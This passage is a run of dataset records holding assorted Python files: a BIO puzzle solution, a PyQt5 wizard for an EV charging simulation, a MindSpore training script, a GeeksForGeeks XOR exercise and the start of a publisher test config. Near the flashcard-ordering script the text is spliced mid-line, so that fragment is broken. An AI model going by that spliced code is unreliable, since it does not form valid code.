'I':Point('C','Q','R'),\n 'J':Point('C','R','S'), 'K':Point('D','S','T'), 'L':Point('D','T','M'),\n 'M':Point('U','L','E'), 'N':Point('U','E','F'), 'O':Point('V','F','G'),\n 'P':Point('V','G','H'), 'Q':Point('W','H','I'), 'R':Point('W','I','J'),\n 'S':Point('X','J','K'), 'T':Point('X','K','L'),\n 'U':Point('V','M','N'), 'V':Point('U','O','P'),\n 'W':Point('X','Q','R'), 'X':Point('W','S','T')\n }\n\nstates = {node:'left' for node in Network}\n\nflipflops = list(input())\nstart, stop = list(input())\nnumber_of_moves = int(input())\n\ndef get_next_node(before,after):\n if Network[after].straight == before: # if we've come from a straight direction\n direction = states[after] # we will leave depending on the state of the current node\n if after in flipflops: # if we're a flip flop node then we must change the state \n states[after] = next(d for d in ('left','right') if d != states[after])\n return Network[after].__getattribute__(direction)\n elif Network[after].left == before: # if we've come from a left direction\n if after not in flipflops: # set the state if it's a lazy node \n states[after] = 'left'\n return Network[after].straight\n elif Network[after].right == before: # if we've come from a right direction\n if after not in flipflops: # set the state if it's a lazy node \n states[after] = 'right' \n return Network[after].straight\n\n\nfor _ in range(number_of_moves):\n start, stop = stop, get_next_node(start,stop)\n\nprint(start + 
stop)\n","repo_name":"s-cork/BIO","sub_path":"2012/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9130701281","text":"import copy\n\nfrom PyQt5 import QtWidgets, QtCore, QtGui\nfrom PyQt5.QtWidgets import QSpinBox, QDoubleSpinBox, QLineEdit, QCheckBox\nfrom PyQt5.QtGui import QKeySequence\n\nfrom PyQt5.QtWidgets import *\nfrom src.app.animation import Animation, VisualizationWindow\nfrom src.models.cities import SquareCity\nfrom src.app.visual_analysis import DistributionVisualization\nfrom src.app.params import LY_ENG_TO_SP, LY_SP_TO_ENG\n\n\n\n\nclass PageParam():\n def __init__(self, widget, minimum, single_step, key, label ):\n self.widget = widget\n self.minimum = minimum\n self.single_step = single_step\n self.key = key\n self.label = label\n\n\nclass ParamsCreationForm(QWidget):\n def __init__(self, app_params, callback, parent=None, flags=QtCore.Qt.WindowFlags()):\n super().__init__(parent=parent, flags=flags)\n\n self.app_params = app_params\n self.internal_params = copy.deepcopy(app_params)\n self.callback = callback\n\n # Create the layout of the class\n self.layout = QVBoxLayout()\n\n # Create the stack that will hold the different pages \n self.stack = QStackedWidget()\n # Add the different pages to the stack\n self.widgets = [CityCreationPage(),PhysicalUnitsPage(), DistributionPage(), GeneralPage(), InstancesPage() ]\n for w in self.widgets:\n self.stack.addWidget(w)\n # Create the button row at the bottom\n self.button_layout = QHBoxLayout()\n self.next_page = QPushButton(\"Siguiente\")\n self.next_page.clicked.connect(self.on_click_next_page)\n self.previous_page = QPushButton(\"Anterior\")\n self.previous_page.clicked.connect(self.on_click_previous_page)\n self.cancel = QPushButton(\"Cancelar\")\n self.cancel.clicked.connect(self.on_click_cancel)\n self.save = QPushButton(\"Establecer parámeteros\")\n self.save.clicked.connect(self.on_click_save)\n\n button_row = [self.cancel, self.previous_page, self.next_page, self.save]\n for button in button_row:\n self.button_layout.addWidget(button)\n self.button_tool = QWidget()\n self.button_tool.setLayout(self.button_layout)\n\n # Perform the initial step\n self.update_page_info()\n self.update_button_tool()\n \n # Configure the general layout with the stack and the button tool row.\n self.layout.addWidget(self.stack)\n self.layout.addWidget(self.button_tool)\n self.setLayout(self.layout)\n \n def update_app_params(self, app_params):\n \"\"\"The internal app_params attribute points to the new ones and also the internal \n parameters are updated, there is a current page update afterwards. \"\"\"\n self.app_params = app_params\n self.internal_params = copy.deepcopy(app_params)\n self.stack.setCurrentIndex(0)\n self.update_page_info()\n self.update_button_tool()\n self.show()\n\n def update_internal_params(self):\n \"\"\"For each widget in the current page widgets_dict, updates the corresponding internal value. 
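The wizard navigation implemented below by on_click_next_page and on_click_previous_page boils down to shifting a QStackedWidget index. A self-contained sketch (assumes PyQt5 and a usable Qt platform, e.g. offscreen; go is an illustrative helper):

from PyQt5.QtWidgets import QApplication, QLabel, QStackedWidget

app = QApplication([])
stack = QStackedWidget()
for title in ('city', 'units', 'distributions'):
    stack.addWidget(QLabel(title))

def go(stack, step):
    # Clamp navigation to the stack's page range.
    new_index = stack.currentIndex() + step
    if 0 <= new_index < stack.count():
        stack.setCurrentIndex(new_index)

go(stack, +1)   # "next" button
assert stack.currentIndex() == 1
go(stack, -1)   # "previous" button
assert stack.currentIndex() == 0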
\"\"\"\n # Point to the current page\n page = self.stack.currentWidget()\n # For each widget inside the page, update the corresponding internal param.\n for k, w in page.widgets_dict.items():\n if isinstance(w, QSpinBox) or isinstance(w, QDoubleSpinBox):\n self.internal_params[k] = w.value()\n elif isinstance(w, QLineEdit):\n if k in [\"EV_DENSITY_VALUES\", \"TF_DENSITY_VALUES\"]:\n self.internal_params[k] = [float(p) for p in w.text().split(\" \") if p != \"\"]\n else:\n self.internal_params[k] = w.text()\n elif isinstance(w, QCheckBox):\n self.internal_params[k] = w.isChecked()\n\n def update_button_tool(self):\n # Check the different cases based on the new page.\n current = self.stack.currentIndex()\n if current == 0:\n self.previous_page.hide()\n self.save.hide()\n self.next_page.show()\n \n elif current == self.stack.count() - 1:\n self.next_page.hide()\n self.save.show()\n self.previous_page.show()\n else:\n self.next_page.show()\n self.previous_page.show()\n self.save.hide()\n\n def update_page_info(self):\n page = self.stack.currentWidget()\n page.update_values(self.internal_params)\n\n def on_click_next_page(self):\n # First update the internal values\n self.update_internal_params()\n # Then, move the stack pointer to the next page.\n self.stack.setCurrentIndex(self.stack.currentIndex()+1)\n # Update the values of the page\n self.update_page_info()\n # Then update the button row to show the proper buttons\n self.update_button_tool()\n \n def on_click_previous_page(self):\n # First update the internal values\n self.update_internal_params()\n # Then, move the stack pointer to the previous page.\n self.stack.setCurrentIndex(self.stack.currentIndex()-1)\n # Update the values of the page\n self.update_page_info()\n # Then update the button row to show the proper buttons\n self.update_button_tool()\n \n def on_click_cancel(self):\n self.stack.setCurrentIndex(0)\n for w in self.widgets:\n w.close_external_window()\n self.hide()\n self.callback()\n\n def on_click_save(self):\n # First, save the parameters from the last page\n self.update_internal_params()\n # Then, override each app_param with the internal one\n for key, value in self.internal_params.items():\n self.app_params[key] = value\n self.on_click_cancel()\n def closeEvent(self, cls):\n for w in self.widgets:\n w.close()\n return super().closeEvent(cls)\nclass Page(QWidget):\n \"\"\"Class that controls the logic of a Page through certain functions. Aspects related to the\n desing of the page are left for classes that inherint this one. \"\"\"\n def __init__(self, parent=None, flags=QtCore.Qt.WindowFlags()):\n super().__init__(parent=parent, flags=flags)\n self.widgets_dict = {}\n\n def add_page_param_to_layout(self, page_params, layout):\n \"\"\"For each PageParam in page_params list, creates the corresponding\n widget object and stores it in a dictionary referenced by its key. 
\"\"\"\n\n widgets = []\n for param in page_params:\n widget = param.widget()\n if type(widget) == QSpinBox or type(widget) == QDoubleSpinBox:\n widget.setMinimum(param.minimum)\n widget.setMaximum(100000000)\n widget.setSingleStep(param.single_step)\n \n self.widgets_dict[param.key] = widget\n layout.addRow(QLabel(param.label), widget)\n widgets.append(widget)\n\n elif type(widget) == QLineEdit:\n self.widgets_dict[param.key] = widget\n layout.addRow(QLabel(param.label), widget)\n widgets.append(widget)\n\n elif type(widget) == QCheckBox: \n self.widgets_dict[param.key] = widget\n layout.addRow(QLabel(param.label), widget)\n widgets.append(widget)\n\n return widgets\n\n def update_values(self, new_values):\n \"\"\"Given a dictionary (WIDGET_KEY:VALUE), updates the widgets inside the\n widgets_dict with the proper values. \"\"\"\n\n for key, widget in self.widgets_dict.items():\n if type(widget) == QSpinBox or type(widget) == QDoubleSpinBox:\n widget.setValue(new_values[key])\n elif type(widget) == QLineEdit:\n if key == \"EV_DENSITY_VALUES\" or key == \"TF_DENSITY_VALUES\":\n widget.setText(\"\".join([str(f)+\" \" for f in new_values[key]]))\n else:\n widget.setText(new_values[key])\n elif type(widget) == QCheckBox:\n widget.setChecked(new_values[key])\n else:\n raise TypeError(\"The widget inside widgets_dict has an unkwon type\")\n def close_external_window(self):\n pass\nclass CityCreationPage(Page):\n def __init__(self, parent=None, flags=QtCore.Qt.WindowFlags()):\n super().__init__(parent=parent, flags=flags)\n # Create the city visualization window\n self.city_visualization = VisualizationWindow()\n \n # City related parameters\n roundabout = PageParam(QSpinBox, 6, 2, \"RB_LENGTH\", \"Tamaño del lado de las rotondas:\")\n av_segment = PageParam(QSpinBox, 20, 8, \"AV_LENGTH\", \"Longitud de una avenida\")\n scale = PageParam(QSpinBox, 1, 1, \"SCALE\", \"Factor de escala del patrón base:\")\n\n # Stations related parameters\n plugs_per_station = PageParam(QSpinBox, 1, 1, \"MIN_PLUGS_PER_STATION\", \"Número mínimo de enchufes por estacion:\")\n d_stations = PageParam(QSpinBox, 1,1,\"MIN_D_STATIONS\", \"Número mínimo de estaciones pequeñas: \")\n\n # Create self layout\n layout = QVBoxLayout()\n \n # Add city configuration subpart\n cities_form = QGroupBox(\"Creación de la ciudad\")\n aux_layout = QFormLayout()\n aux_layout.setSizeConstraint(QLayout.SetMinimumSize)\n aux_layout.addRow(QLabel(\"Configuración de la ciudad sintética con rotondas, calles y avenidas.\"))\n self.add_page_param_to_layout([roundabout, av_segment,scale], aux_layout)\n show_city_button = QPushButton(\"Mostrar ciudad\")\n show_city_button.clicked.connect(self.show_city)\n aux_layout.addRow(show_city_button)\n\n\n cities_form.setLayout(aux_layout)\n # Add the cities_form to the layout and create a new part of the form.\n layout.addWidget(cities_form)\n\n # Add stations configuration subpart\n stations_form = QGroupBox(\"Configuración de la distribución de las estaciones\")\n aux_layout = QFormLayout()\n aux_layout.setSizeConstraint(QLayout.SetMinimumSize)\n aux_layout.addRow(QLabel(\"El número de estaciones pequeñas total será el siguiente número múltiplo de cuatro y\\n cuadrado perfecto del número mínimo indicado \"))\n self.add_page_param_to_layout([plugs_per_station,d_stations ], aux_layout)\n \n show_st_layout_button = QPushButton(\"Mostrar estaciones\")\n show_st_layout_button.clicked.connect(self.show_stations)\n self.choose_st_layout = QComboBox()\n self.choose_st_layout.addItems(LY_SP_TO_ENG.keys())\n 
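The widget read-back used in update_internal_params and the write path in update_values both dispatch on the Qt input type. The read side, factored into one helper for reference (read_widget is illustrative, not part of the class):

from PyQt5.QtWidgets import QCheckBox, QDoubleSpinBox, QLineEdit, QSpinBox

def read_widget(widget):
    # Each Qt input type exposes its current value under a different name.
    if isinstance(widget, (QSpinBox, QDoubleSpinBox)):
        return widget.value()
    if isinstance(widget, QLineEdit):
        return widget.text()
    if isinstance(widget, QCheckBox):
        return widget.isChecked()
    raise TypeError('unsupported widget type: ' + type(widget).__name__)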
aux_line_layout = QHBoxLayout()\n aux_line_layout.addWidget(show_st_layout_button)\n aux_line_layout.addWidget(self.choose_st_layout)\n \n aux_layout.addRow(aux_line_layout)\n stations_form.setLayout(aux_layout)\n\n # Add the stations_form to the layout\n layout.addWidget(stations_form)\n # Add a save image button to the layout\n save_button = QPushButton(\"Guardar imagen\")\n save_button.clicked.connect(self.save_new_image)\n layout.addWidget(save_button)\n\n # Set the layout\n self.setLayout(layout)\n def show_city(self):\n \"\"\"Reads the values of the QSpingBox parameters and creates and new city. Then it opens\n the visualization window and renders a new visualization of the newly created city. \"\"\"\n\n # Create the city\n rb_length = self.widgets_dict[\"RB_LENGTH\"].value()\n av_length = self.widgets_dict[\"AV_LENGTH\"].value()\n scale = self.widgets_dict[\"SCALE\"].value()\n city = SquareCity(RB_LENGTH=rb_length, AV_LENGTH=av_length, SCALE=scale)\n\n # Display the new city\n self.city_visualization.show()\n self.city_visualization.show_new_city(city.SIZE, city.city_matrix, city.city_map)\n \n\n def show_stations(self):\n # Create the city\n rb_length = self.widgets_dict[\"RB_LENGTH\"].value()\n av_length = self.widgets_dict[\"AV_LENGTH\"].value()\n scale = self.widgets_dict[\"SCALE\"].value()\n city = SquareCity(RB_LENGTH=rb_length, AV_LENGTH=av_length, SCALE=scale)\n self.city_visualization.show()\n # Place the stations in the city based on the parameters chosen.\n min_plugs_per_station = self.widgets_dict[\"MIN_PLUGS_PER_STATION\"].value()\n min_num_stations = self.widgets_dict[\"MIN_D_STATIONS\"].value()\n \n _, TOTAL_D_ST = city.set_max_chargers_stations(min_plugs_per_station, min_num_stations)\n stations_pos, stations_influence = city.place_stations_new(LY_SP_TO_ENG[self.choose_st_layout.currentText()], TOTAL_D_ST)\n \n # Display the newly created city with the stations.\n self.city_visualization.show_new_city(city.SIZE, city.city_matrix, stations_pos=stations_pos, stations_influence=stations_influence) \n\n def save_new_image(self):\n self.city_visualization.update()\n image = self.city_visualization.save_image()\n if image != None:\n path = QFileDialog.getSaveFileName(self, \"Guardar imagen como\")[0]\n if path and image:\n image.save(path+\".png\", \"png\", quality=95)\n def close_external_window(self):\n self.city_visualization.close()\n \n def closeEvent(self, cls):\n self.city_visualization.close()\n return super().closeEvent(cls)\nclass PhysicalUnitsPage(Page):\n def __init__(self, parent=None, flags=QtCore.Qt.WindowFlags()):\n super().__init__(parent=parent, flags=flags)\n # Create the Params\n # Speed parameters\n speed = PageParam(QSpinBox, 1, 1, \"SPEED\", \"Velocidad media en las calles (km/h):\")\n cell_length = PageParam(QSpinBox, 1, 1, \"CELL_LENGTH\", \"Longitud de una celda (m):\")\n simulation_speed = PageParam(QSpinBox, 1, 1, \"SIMULATION_SPEED\", \"Velocidad de la simulación (cell/timestep):\")\n\n # Battery parameters\n battery_capacity = PageParam(QSpinBox, 1, 1, \"BATTERY\", \"Capacidad de la batería (kWh):\")\n station_power = PageParam(QSpinBox, 1, 1, \"CS_POWER\", \"Potencia de las estaciones (kW):\")\n\n\n # Set the layout of the (self) widget\n layout = QVBoxLayout()\n layout.setSizeConstraint(QLayout.SetMinimumSize)\n\n # Subsection about velocity related parameters\n form_speed = QGroupBox(\"Unidades físicas - Velocidad\")\n layout_aux = QFormLayout()\n layout_aux.setSizeConstraint(QLayout.SetMinimumSize)\n self.add_page_param_to_layout([speed, 
cell_length,simulation_speed], layout_aux)\n form_speed.setLayout(layout_aux)\n\n # Add the first subform to the general layout\n layout.addWidget(form_speed)\n\n # Subsection about energy related parameters\n form_battery = QGroupBox(\"Unidades físicas - energía\")\n layout_aux = QFormLayout()\n layout_aux.setSizeConstraint(QLayout.SetMinimumSize)\n self.add_page_param_to_layout([battery_capacity, station_power], layout_aux)\n form_battery.setLayout(layout_aux)\n\n # Add the second subform to the layout combined and set the general layout.\n layout.addWidget(form_battery)\n\n self.setLayout(layout)\n\nclass DistributionPage(Page):\n def __init__(self, parent=None, flags=QtCore.Qt.WindowFlags()):\n super().__init__(parent=parent, flags=flags)\n # Create the visualization window\n self.distribution_visualization = DistributionVisualization()\n # Create the PageParam\n battery_autonomy = PageParam(QSpinBox, 1, 1, \"AUTONOMY\", \"Autonomía de una carga completa (km):\")\n battery_thresh = PageParam(QDoubleSpinBox, 0.05, 0.01, \"BATTERY_THRESHOLD\", \"Umbral mínimo de batería (tanto por uno):\")\n battery_std = PageParam(QDoubleSpinBox, 0.05, 0.01, \"BATTERY_STD\", \"Desviación estándar de la batería (tanto por uno):\")\n \n idle_upper = PageParam(QSpinBox, 1, 1, \"IDLE_UPPER\", \"Máximo tiempo en espera (min):\")\n idle_lower = PageParam(QSpinBox, 1, 1, \"IDLE_LOWER\", \"Mínimo tiempo en espera (min):\")\n idle_std = PageParam(QDoubleSpinBox, 0.05, 0.01, \"IDLE_STD\", \"Desviación estándar del tiempo en espera (tanto por uno):\")\n\n layout = QVBoxLayout()\n\n # Create first section defined by a GroupBox\n battery_form = QGroupBox(\"Distribución de la autonomía de batería\")\n aux_layout = QFormLayout()\n aux_layout.setSizeConstraint(QLayout.SetMinimumSize)\n widgets = self.add_page_param_to_layout([battery_autonomy,battery_thresh, battery_std], aux_layout)\n for w in widgets:\n w.valueChanged.connect(self.update_battery_distribution)\n battery_form.setLayout(aux_layout)\n\n # Add the section to the general layout and then create another section\n layout.addWidget(battery_form)\n\n # Create the second section defined by another Groupbox.\n wait_form = QGroupBox(\"Distribución del tiempo de espera\")\n aux_layout = QFormLayout()\n aux_layout.setSizeConstraint(QLayout.SetMinimumSize)\n\n widgets = self.add_page_param_to_layout([idle_upper, idle_lower, idle_std], aux_layout)\n for w in widgets:\n w.valueChanged.connect(self.update_wait_distribution)\n wait_form.setLayout(aux_layout)\n\n # Add the section to the general layout and set the class layout.\n layout.addWidget(wait_form) \n self.setLayout(layout)\n\n def update_battery_distribution(self):\n \"\"\"Creates a new normal distribution sample and opens a window with the corresponding\n normal distribution. Uses the values for a battery distribution.\"\"\"\n\n mean = self.widgets_dict[\"AUTONOMY\"].value() // 2\n std = float(self.widgets_dict[\"BATTERY_STD\"].value()) * mean\n low = float(self.widgets_dict[\"BATTERY_THRESHOLD\"].value()) * self.widgets_dict[\"AUTONOMY\"].value()\n \n upper= self.widgets_dict[\"AUTONOMY\"].value()\n\n if upper > low:\n self.distribution_visualization.update_canvas(mean, std, low, upper, \"Autonomía (km)\" )\n self.distribution_visualization.show() \n\n def update_wait_distribution(self):\n \"\"\"Creates a new normal distribution sample and opens a window with the corresponding\n normal distribution. Uses the values of the wait time distribution. 
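The battery parameters above describe a normal distribution with mean AUTONOMY/2 and standard deviation BATTERY_STD * mean, truncated to [BATTERY_THRESHOLD * AUTONOMY, AUTONOMY]. The simulator's actual sampler is not shown here; a sketch of one way to draw from that distribution, consistent with the bounds passed to the visualization (values illustrative):

from scipy.stats import truncnorm

autonomy, battery_std, battery_threshold = 135, 0.25, 0.25
mean = autonomy / 2
std = battery_std * mean
low, upper = battery_threshold * autonomy, autonomy

# truncnorm takes its bounds in standard-deviation units around loc.
a, b = (low - mean) / std, (upper - mean) / std
samples = truncnorm.rvs(a, b, loc=mean, scale=std, size=10_000)
assert low <= samples.min() and samples.max() <= upper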
\"\"\"\n low = int(self.widgets_dict['IDLE_LOWER'].value())\n upper = int(self.widgets_dict['IDLE_UPPER'].value())\n mean = (low + upper) /2\n std = float(self.widgets_dict['IDLE_STD'].value())* mean\n\n if upper > low:\n self.distribution_visualization.update_canvas(mean, std, low, upper, \"Tiempo en espera (min)\")\n self.distribution_visualization.show()\n def close_external_window(self):\n self.distribution_visualization.close()\n def closeEvent(self, cls):\n self.distribution_visualization.close()\n return super().closeEvent(cls)\nclass GeneralPage(Page):\n def __init__(self, parent=None, flags=QtCore.Qt.WindowFlags()):\n super().__init__(parent=parent, flags=flags)\n\n # Create the PageParam for this class\n repetitions =PageParam(QSpinBox, 1, 1, \"REPETITIONS\", \"Número de repeticiones de cada simulación:\")\n total_time = PageParam(QSpinBox, 1, 1, \"TOTAL_TIME\", \"Tiempo total de simulación (h):\")\n measure_period = PageParam(QSpinBox,0, 1, \"MEASURE_PERIOD\", \"Tiempo entre cada medición del sistema (min):\")\n directory_path = PageParam(QLineEdit, None, None, \"PATH\", \"Directorio seleccionado:\")\n # Create the layout for this class\n layout = QVBoxLayout()\n\n # First section, general configuration\n configuration_form = QGroupBox(\"Configuración general de las simulaciones\")\n aux_layout = QFormLayout()\n aux_layout.setSizeConstraint(QLayout.SetMinimumSize)\n self.add_page_param_to_layout([repetitions,total_time,measure_period ], aux_layout)\n configuration_form.setLayout(aux_layout)\n\n # Add the section to the general layout\n layout.addWidget(configuration_form)\n\n # Second section, PATH input.\n path_form = QGroupBox(\"Configuarción de los resultados\")\n aux_layout = QFormLayout()\n msg = \"\"\"Seleccione el directorio donde se van a guardar los resultados de las simulaciones.\\nPuede seleccionar uno del sistema haciendo click en el botón o bien escribir manualmente el directorio.\"\"\"\n aux_layout.addRow(QLabel(msg))\n self.add_page_param_to_layout([directory_path], aux_layout)\n change_path_button = QPushButton(\"Seleccionar directorio del sistema\")\n change_path_button.clicked.connect(self.on_click_change_path_button)\n aux_layout.addRow(change_path_button)\n path_form.setLayout(aux_layout)\n\n # Add the section to the general layout\n layout.addWidget(path_form)\n\n self.setLayout(layout)\n def on_click_change_path_button(self):\n path = QFileDialog.getExistingDirectory(caption=\"Seleccionar directorio de resultados\")\n if path:\n self.widgets_dict['PATH'].setText(path)\n\n\nclass InstancesPage(Page):\n def __init__(self, parent=None, flags=QtCore.Qt.WindowFlags()):\n super().__init__(parent=parent, flags=flags)\n \n # Create the PageParam for this class\n ev_density = PageParam(QLineEdit, None, None, \"EV_DENSITY_VALUES\", \"Valores de densidad de VE:\")\n tf_density = PageParam(QLineEdit, None, None, \"TF_DENSITY_VALUES\", \"Valores de densidad de tráfico:\")\n\n st_central = PageParam(QCheckBox, None, None, \"ST_CENTRAL\", \"Una estación centrada en una avenida\")\n st_distributed = PageParam(QCheckBox, None, None, \"ST_DISTRIBUTED\", \"Pequeñas estaciones en las calles\")\n st_four = PageParam(QCheckBox, None, None, \"ST_FOUR\", \"Cuatro estaciones medianas en las avenidas\")\n\n # Create the class layout\n layout = QVBoxLayout()\n\n # Create the first section about the traffic\n vehicles_form = QGroupBox(\"Configuración de instancias - Vehículos\")\n aux_layout = QFormLayout()\n aux_layout.setSizeConstraint(QLayout.SetMinimumSize)\n 
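Related detail: update_internal_params parses EV_DENSITY_VALUES and TF_DENSITY_VALUES from free text, and the instances page below collects them as space-separated floats. The parsing idiom in isolation:

def parse_densities(text):
    # Skipping empty tokens tolerates repeated or trailing spaces.
    return [float(p) for p in text.split(' ') if p != '']

assert parse_densities('0.1 0.2  0.3 ') == [0.1, 0.2, 0.3]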
aux_layout.addRow(QLabel('Introduzca los valores de densidad de VE y densidad de tráfico.\\nPara separar cada valor utilizar un espacio en blanco. \\n Por ejemplo: 0.1 0.2 0.3 0.4 '))\n self.add_page_param_to_layout([tf_density, ev_density], aux_layout)\n vehicles_form.setLayout(aux_layout)\n\n layout.addWidget(vehicles_form)\n\n # Create the second section about the stations\n stations_form = QGroupBox(\"Configuración de instancias - Estaciones\")\n aux_layout = QFormLayout()\n aux_layout.setSizeConstraint(QLayout.SetMinimumSize)\n aux_layout.addRow(QLabel(\"Marque todas las disposiciones de estaciones que desee probar. Al menos una\"))\n self.add_page_param_to_layout([st_central, st_distributed,st_four], aux_layout)\n stations_form.setLayout(aux_layout)\n\n layout.addWidget(stations_form)\n\n self.setLayout(layout)\n","repo_name":"amarogs/simtravel","sub_path":"src/app/parameters_form.py","file_name":"parameters_form.py","file_ext":"py","file_size_in_byte":23097,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"18880428552","text":"# list=['p','q']\n# # ['p1','q1','p2','q2','p3','q3','p4','q4','p5,'q5]\n# n=5\n# b=[]\n# i=1\n# while i= most_changes:\n deck.append(card)\n tmp_unused = unused.copy()\n tmp_unused.remove(card)\n find_most_changes(tmp_unused, deck, tmp_deck_max_cost, max_pair_cost)\n del deck[-1] # remove last one\n elif deck_max_cost > most_changes:\n most_changes = deck_max_cost\n print('%d: %s' % (deck_max_cost, deck))\n\ncards = [ 'ROD', 'RAM', 'MOM', 'ELM', 'ALBUM', 'BULB', 'SUB', 'NUN', 'BUN', 'BUS', 'BIN', 'BIB', 'BED', 'SLED', 'LID', 'LAD', 'DAD', 'MAN', 'FAN', 'FLAN' ]\n\nbar = Bar('Finding least changes (%d min)' % (len(cards) - 1), max=factorial(len(cards)))\nfind_least_changes(cards, good_enough=len(cards))\nbar.finish()\nprint()\nprint('-----------------')\nprint()\nprint('Finding most changes')\nfind_most_changes(cards)","repo_name":"AlexEdgcomb/baby_education","sub_path":"flashcard_chooser/logical_card_ordering.py","file_name":"logical_card_ordering.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36670106023","text":"import os\nimport cv2\nimport time\nimport numpy as np\n\nfrom mindspore.nn import SGD\nfrom mindspore import context, TimeMonitor, Model, load_checkpoint, load_param_into_net\nimport mindspore.common.dtype as mstype\nfrom mindspore.train.callback import CheckpointConfig, ModelCheckpoint\n\nfrom src.config import config\nfrom src.ssh_model import SSHModel\nfrom src.network_define import LossNet, WithLossCell, TrainOneStepCell, LossCallBack\nfrom src.dataset import data_to_mindrecord_byte_image, create_wider_dataset\n\n\nrank = 0\ndevice_num = 1\ncontext.set_context(mode=context.PYNATIVE_MODE, device_target=config.device_target, device_id=0)\n\ndef prepare_wider_dataset():\n \"\"\" prepare wider dataset \"\"\"\n print(\"Start create dataset!\")\n\n prefix = \"wider.mindrecord\"\n mindrecord_dir = config.mindrecord_dir\n mindrecord_file = os.path.join(mindrecord_dir, prefix + \"0\")\n print(\"CHECKING MINDRECORD FILES ...\")\n\n if rank == 0 and not os.path.exists(mindrecord_file + \".db\"):\n if not os.path.isdir(mindrecord_dir):\n os.makedirs(mindrecord_dir)\n\n if os.path.isdir(config.image_dir) and os.path.exists(config.anno_path):\n if not os.path.exists(config.image_dir):\n print(\"Please make sure config:image_dir is valid.\")\n raise ValueError(config.image_dir)\n 
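The dataset preparation here follows a common multi-rank pattern, continued just below: rank 0 builds the MindRecord once, and every rank blocks on a sentinel file before reading. The guard in miniature (wait_for_file is a hypothetical name):

import os
import time

def wait_for_file(path, poll_seconds=5):
    # Block until another process has finished writing the artifact.
    while not os.path.exists(path):
        time.sleep(poll_seconds)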
print(\"Create Mindrecord. It may take some time.\")\n data_to_mindrecord_byte_image(config, prefix)\n print(\"Create Mindrecord Done, at {}\".format(mindrecord_dir))\n else:\n print(\"image_dir or anno_path not exits.\")\n\n while not os.path.exists(mindrecord_file + \".db\"):\n time.sleep(5)\n\n print(\"CHECKING MINDRECORD FILES DONE!\")\n\n dataset = create_wider_dataset(config, mindrecord_file, batch_size=config.batch_size,\n device_num=device_num, rank_id=rank,\n num_parallel_workers=config.num_parallel_workers,\n python_multiprocessing=config.python_multiprocessing)\n\n dataset_size = dataset.get_dataset_size()\n print(\"Create dataset done!\")\n\n return dataset_size, dataset\n\n\ndef train_ssh():\n dataset_size, dataset = prepare_wider_dataset()\n\n net = SSHModel(config)\n net = net.set_train()\n\n param_dict = load_checkpoint('./ssh.ckpt')\n keys = [key for key in param_dict]\n for k in keys:\n if k.find('reg') != -1 or k.find('cls') != -1:\n param_dict.pop(k)\n load_param_into_net(net, param_dict)\n\n device_type = \"Ascend\" if context.get_context(\"device_target\") == \"Ascend\" else \"Others\"\n if device_type == \"Ascend\":\n net.to_float(mstype.float16)\n\n loss = LossNet()\n opt = SGD(params=net.trainable_params(), learning_rate=config.lr, momentum=config.momentum,\n weight_decay=config.weight_decay, loss_scale=config.loss_scale)\n net_with_loss = WithLossCell(net, loss)\n net = TrainOneStepCell(net_with_loss, opt, sens=config.loss_scale)\n\n time_cb = TimeMonitor(data_size=dataset_size)\n loss_cb = LossCallBack(per_print_times=dataset_size, rank_id=rank)\n ckptconfig = CheckpointConfig(save_checkpoint_steps=dataset_size,\n keep_checkpoint_max=4)\n save_checkpoint_path = os.path.join(config.save_checkpoint_path, \"ckpt_\" + str(rank) + \"/\")\n ckpoint_cb = ModelCheckpoint(prefix='ssh', directory=save_checkpoint_path, config=ckptconfig)\n cb = [time_cb, loss_cb, ckpoint_cb]\n\n model = Model(net)\n model.train(config.epoch_size, dataset, callbacks=cb)\n\n\ntrain_ssh()\n","repo_name":"Tangzl7/SSH-MindSpore","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27459799070","text":"'''\nGiven two integers numbers N and K, the Geek wants you to find f(f(..........f(N))) K times, where f(x) = x XOR (x%10).\nNote: XOR represents bitwise xor operation\n\nInput:\n1. The first line of the input contains a single integer T denoting the number of test cases. The description of T test cases follows.\n2. The first line of each test case contains two integers N and K.\n\nOutput: For each test case, print the answer\n\nConstraints:\n1. 1 <= T <= 10\n2. 1 <= N <= 105\n3. 
1 <= K <= 109\n\nExample:\n\nInput:\n2\n17 1\n66 3\n\nOutput:\n22\n74\n'''\n\nt = int(input())\n\nwhile t:\n n, k = input().split(' ')\n n, k = int(n), int(k)\n \n res = n\n \n for i in range(k):\n if not res % 10:\n break\n res ^= res % 10\n \n print(res)\n \n t -= 1\n","repo_name":"nirmalnishant645/Python-Programming","sub_path":"Geeks-For-Geeks/Geek-and-Function-V.py","file_name":"Geek-and-Function-V.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"444255319","text":"# -*- coding: utf-8 -*-\nfrom cStringIO import StringIO\nimport collections\nimport json\n\nimport py\nimport pytest\nimport mock\nfrom yatest.common import source_path\n\nfrom market.idx.pylibrary.mindexer_core.publishers.publisher import reconfigure_zk\nfrom market.idx.pylibrary.mindexer_core.publishers.async_publisher import write_publisher_config_to_zk\nfrom market.idx.marketindexer.marketindexer import miconfig\nfrom market.idx.marketindexer.miconfig import TwoPhaseReloadMetaSection\nfrom async_publishing.group_config import TwoPhaseReloadMetaConfig\n\n\nREDUCTOR_CONFIG = StringIO('''{\n \"reload_timeout\": 600,\n \"dcgroups\": {\n \"prod_report_int_vla@vla\": {\n \"async_publishing_mode\": \"disabled\",\n \"simultaneous_restart\": 3,\n \"failures_threshold\": 4,\n \"hosts\": {\n \"host1\": {\n \"key\": \"key:host1.net\",\n \"name\": \"host1.net\",\n \"cluster\": 0,\n \"dists\": {\n \"search-stats\": {},\n \"search-part-1\": {}\n },\n \"service\": \"marketsearch3\"\n },\n \"host2\": {\n \"key\": \"key:host2.net\",\n \"name\": \"host2.net\",\n \"cluster\": 0,\n \"dists\": {\n \"search-stats\": {},\n \"search-part-2\": {}\n },\n \"service\": \"marketsearch3\",\n \"port\": 17051\n }\n }\n },\n 